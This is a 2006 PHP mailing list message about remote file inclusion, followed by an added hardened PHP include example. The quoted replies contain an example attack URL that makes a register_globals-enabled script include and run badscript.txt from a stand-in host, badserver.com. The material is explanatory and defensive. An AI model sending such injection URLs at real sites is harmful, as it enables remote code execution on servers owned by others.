Re: Fwd: Highjack?

At 1:39 PM -0500 11/14/06, Chris Shiflett wrote:
> tedd wrote:
> > > The script will then include
> > > http://www.badserver.com/badscript.txt?dummy=script.php
> >
> > I still don't see how "badscript.php" can be uploaded into
> > example.com's site in the first place
>
> PHP sends a request to badserver.com for badscript.txt, and the content
> of the response is included just as if it were the content of a local file.
>
> Hope that helps.
>
> Chris

Chris;

I'm still confused.

At 7:12 PM +0100 11/13/06, Rory Browne wrote:
> If register_globals is enabled, someone could
> http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=

If example.com is my domain, then how could evil-doer get access to my site to place "badscript.php" there?

tedd

--
-------
http://sperling.com  http://ancientstones.com  http://earthstones.com

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
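
The include pattern this thread is discussing, as an added example that is not part of any poster's message: it assumes the script already on example.com builds its include path from a request-controlled `$path`, so the remote content is fetched by PHP itself rather than uploaded. The `module` parameter, the `includes` directory and the file names are hypothetical, and the hardened form targets current PHP (7.1 or later).

```php
<?php
// Constructed illustration, not code from the thread.
// Assumed vulnerable form in the script on example.com (left as a comment):
//     include $path . 'script.php';
// With register_globals on, ?path=... in the URL sets $path. If remote
// includes are permitted, include() treats a URL value as something to fetch.

// php.ini settings that close this off at the configuration level:
//     register_globals  = Off   ; directive removed entirely in PHP 5.4
//     allow_url_include = Off   ; available since PHP 5.2, default Off

// Hardened form: request data only selects a key; the file path is fixed here.
const INCLUDE_DIR = __DIR__ . '/includes';        // hypothetical directory
const ALLOWED_MODULES = [                         // hypothetical module map
    'news'    => 'news/script.php',
    'contact' => 'contact/script.php',
];

function resolve_include(string $key): ?string
{
    // Anything not in the map is rejected: URLs, "../" sequences, empty values.
    if (!isset(ALLOWED_MODULES[$key])) {
        return null;
    }
    $base = realpath(INCLUDE_DIR);
    $file = realpath(INCLUDE_DIR . '/' . ALLOWED_MODULES[$key]);
    if ($base === false || $file === false) {
        return null;                              // directory or file is missing
    }
    // Defence in depth: the resolved path must still sit under INCLUDE_DIR,
    // which also catches a symlink pointing elsewhere.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

// Read the selector explicitly from $_GET; never rely on injected globals.
$key = isset($_GET['module']) ? (string) $_GET['module'] : 'news';
$target = resolve_include($key);
if ($target === null) {
    http_response_code(404);
    exit('Unknown module');
}
include $target;
```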

